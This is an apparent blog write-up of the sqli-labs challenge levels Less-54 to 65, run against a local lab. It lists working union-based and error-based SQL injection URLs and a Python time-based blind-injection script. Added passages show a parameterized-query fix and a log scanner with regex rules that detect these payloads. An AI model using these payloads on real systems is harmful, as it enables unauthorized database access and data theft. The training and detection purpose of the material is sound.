sqli-labs Write-up (Part 4)

Challenges

Von's Blog   2019-08-30   3751 words

Less-54

From this level on we enter the Challenges. I find this mode a bit novel: it limits the number of attempts, and, like a CTF, it asks for a target secret key. This level gives 10 attempts in total.

1.  127.0.0.1/sqli-labs-master/Less-54/?id=1' and 1=1--+
2.  127.0.0.1/sqli-labs-master/Less-54/?id=1' and 1=2--+
3.  127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 1--+
4.  127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 2--+
5.  127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 3--+
6.  127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 4--+
7.  127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,3--+
8.  127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
9.  127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='cyyiapy75g'--+
10.  127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(sessid,0x3a,secret_FBHX) from cyyiapy75g--+
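All ten steps above depend on the same defect: the id parameter is pasted straight into the SQL text, so a quoted value can close the string literal and append a UNION of its own. The following Python script is an added example, not part of the original write-up or of sqli-labs. It builds a small in-memory SQLite stand-in for the lab tables, feeds it the step-7 probe and a Less-55-style subquery pointed at the Less-54 table name, and shows the concatenated query returning attacker-chosen rows while the same input bound through a placeholder matches nothing. The users rows and the secret value are constructed; SQLite stands in for MySQL, so the MySQL-only group_concat(..., 0x3a, ...) form from step 10 is not reproduced.

```python
import sqlite3

# Constructed in-memory stand-in for the lab database: a users table shaped
# like sqli-labs' and a secret table named after the one found in Less-54.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    conn.execute("CREATE TABLE cyyiapy75g (sessid TEXT, secret_FBHX TEXT)")
    conn.execute("INSERT INTO cyyiapy75g VALUES ('sess-constructed', 'KEY-constructed')")
    return conn

def lookup_vulnerable(conn, user_id):
    # The lab's pattern: the raw parameter is interpolated into the statement.
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # Placeholder binding: the value travels separately from the statement text,
    # so quotes, UNION and comment markers inside it are just characters.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()

# The Less-54 step-7 payload after URL decoding ("--+" becomes "-- ").
UNION_PROBE = "-1' union select 1,2,3-- "
# Same shape as the page's Less-55 step 6, aimed at the Less-54 table name.
UNION_EXFIL = "-1' union select 1,2,(select secret_FBHX from cyyiapy75g)-- "

def demo():
    """Run a normal lookup and both payloads through each query builder."""
    conn = build_db()
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "1"),
        "probe_vulnerable": lookup_vulnerable(conn, UNION_PROBE),
        "exfil_vulnerable": lookup_vulnerable(conn, UNION_EXFIL),
        "probe_parameterized": lookup_parameterized(conn, UNION_PROBE),
        "exfil_parameterized": lookup_parameterized(conn, UNION_EXFIL),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

Running it prints the five results: the concatenated builder hands back (1, 2, 3) for the probe and the constructed secret for the subquery, while the parameterized builder returns an empty list for both. Binding is the fix the challenge code lacks; the 10-attempt limit is a game mechanic, not a control, since the first correct UNION already returns the data.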

Less-55

1.  127.0.0.1/sqli-labs-master/Less-55/?id=1' and 1=1--+
2.  127.0.0.1/sqli-labs-master/Less-55/?id=1') and 1=1--+
3.  127.0.0.1/sqli-labs-master/Less-55/?id=1) and 1=1--+
4.  127.0.0.1/sqli-labs-master/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
5.  127.0.0.1/sqli-labs-master/Less-55/?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='5q25g5zis5'--+
6.  127.0.0.1/sqli-labs-master/Less-55/?id=-1) union select 1,2,(select secret_8TNV from 5q25g5zis5)--+

Less-56

1.  127.0.0.1/sqli-labs-master/Less-56/?id=1' and 1=1--+
2.  127.0.0.1/sqli-labs-master/Less-56/?id=1') and 1=1--+
3.  127.0.0.1/sqli-labs-master/Less-56/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
4.  127.0.0.1/sqli-labs-master/Less-56/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='yozuj3pzjl'--+
5.  127.0.0.1/sqli-labs-master/Less-56/?id=-1') union select 1,2,(select secret_UBWQ from yozuj3pzjl)--+

Less-56

A quick test shows the closing sequence is '); the remaining steps are the same as the previous levels.

Less-57

A quick test shows the closing sequence is "; the remaining steps are the same as the previous levels.

Less-58

Testing shows the closing sequence is ', but union injection returns no data here, so we turn to error-based injection instead.

127.0.0.1/sqli-labs-master/Less-58/?id=1' and extractvalue(1,concat(1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+
http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='n7dnsulx9w')))--+
http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and extractvalue(1,concat(1,(select group_concat(secret_WMWC) from n7dnsulx9w)))--+

Less-59

This level only changes the closing from ' to no closing at all. The remaining steps follow Less-58.

Less-60

This level changes the closing to "); the remaining steps follow Less-58.

Less-61

First pass in id=1' and observe the following error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')) LIMIT 0,1' at line 1

So the closing sequence is ')); the next steps follow Less-58.

Less-62

The attempt limit of 130 alone tells us this is blind injection. The script:

import requests
import time

url = "http://127.0.0.1/sqli-labs-master/Less-62/"
result = ''
string1 = '0123456789abcdefghijklmnopqrstuvwxyz'
# the challenge session cookie recorded when this was run
headers = {"Cookie": "challenge=b1d69d7f6eceef8700a1dc70160ec0ff"}
for i in range(1, 11):
    for j in string1:
        # sleep(1) when character i of the table list is greater than j, sleep(2) otherwise
        payload = "1') and if((substr((select group_concat(table_name)from(information_schema.tables)where(table_schema)='challenges'),{},1)>'{}'),sleep(1),sleep(2))#".format(i, j)
        data = {"id": payload}
        time1 = time.time()
        r = requests.get(url, params=data, headers=headers)
        time2 = time.time()
        time3 = time2 - time1
        # a response slower than 3 seconds counts as a hit; record j and move to the next position
        if time3 > 3:
            result += j
            print(result)
            break

Done this way it already exceeds 130 requests. I haven't used binary search here, but even with binary search it would not fit within the limit. I'll leave this one to the experts.
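Every payload in this write-up leaves a recognisable trace in the web server's access log: the UNION and information_schema reads of Less-54 to 57, the extractvalue() calls of Less-58 to 61, and the sleep()-driven probes that the Less-62 script sends 36 times per character. The challenges' attempt counters are in effect a per-session version of the same observation. The script below is an added example, not part of the original post or of sqli-labs: it parses constructed Apache-style log lines carrying URL-encoded copies of the payloads shown above, tags each request by the technique it matches, and flags client addresses that exceed a small threshold. The log lines, IP addresses, timestamps and rule names are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (Apache common-log shape). The query strings are
# the payloads from this write-up as a browser or requests client encodes them.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Aug/2019:10:01:01 +0800] "GET /sqli-labs-master/Less-54/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [30/Aug/2019:10:01:02 +0800] "GET /sqli-labs-master/Less-54/?id=1%27%20and%201%3D1--+ HTTP/1.1" 200 512
10.0.0.5 - - [30/Aug/2019:10:01:05 +0800] "GET /sqli-labs-master/Less-54/?id=-1%27%20union%20select%201%2C2%2Cgroup_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29--+ HTTP/1.1" 200 600
10.0.0.5 - - [30/Aug/2019:10:02:10 +0800] "GET /sqli-labs-master/Less-58/?id=1%27%20and%20extractvalue%281%2Cconcat%281%2C%28select%20table_name%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29%20limit%200%2C1%29%29%29--+ HTTP/1.1" 200 700
10.0.0.7 - - [30/Aug/2019:10:03:00 +0800] "GET /sqli-labs-master/Less-62/?id=1%27%29%20and%20if%28%28substr%28%28select%20group_concat%28table_name%29from%28information_schema.tables%29where%28table_schema%29%3D%27challenges%27%29%2C1%2C1%29%3E%270%27%29%2Csleep%281%29%2Csleep%282%29%29%23 HTTP/1.1" 200 500
10.0.0.9 - - [30/Aug/2019:10:04:00 +0800] "GET /sqli-labs-master/Less-54/?id=2 HTTP/1.1" 200 512
"""

# One rule per technique seen in the write-up, applied to the decoded parameter value.
RULES = [
    ("boolean_probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),   # 1' and 1=1
    ("union_enum", re.compile(r"union\s+select", re.I)),                 # UNION column probing
    ("schema_read", re.compile(r"information_schema\.", re.I)),           # table/column enumeration
    ("error_based", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),  # Less-58 style
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),        # Less-62 style
    ("comment_tail", re.compile(r"(--\s|#)\s*$")),                        # trailing --+ or #
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d+)'
)

def classify_request(target):
    """Return the set of rule names matching any query parameter of a request target."""
    hits = set()
    # parse_qs percent-decodes and turns '+' into a space, so '--+' becomes '-- '.
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            for name, pattern in RULES:
                if pattern.search(value):
                    hits.add(name)
    return hits

def scan_log(text):
    """Yield (client ip, path, sorted rule names) for every request that matched a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("target"))
        if tags:
            findings.append((m.group("ip"), m.group("target").split("?")[0], sorted(tags)))
    return findings

def suspicious_sources(findings, threshold=2):
    """Clients with at least `threshold` flagged requests, the log-side twin of the attempt counter."""
    counts = Counter(ip for ip, _, _ in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, path, tags in found:
        print(ip, path, ",".join(tags))
    print("sources over threshold:", suspicious_sources(found))
```

Against the sample, four of the six requests are flagged and 10.0.0.5 crosses the threshold with three hits while 10.0.0.7 stays at one; in practice the threshold would be tuned per endpoint, and the time_based rule is best paired with the request duration field that Apache's %D or nginx's $request_time can add to the log, since a single sleep() probe looks like any other slow request without it.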

Less-63

Same as Less-62, except the closing changes from ') to '.

Less-64

Same as Less-62, except the closing changes from ') to )).

Less-65

Same as Less-62, except the closing changes from ') to ).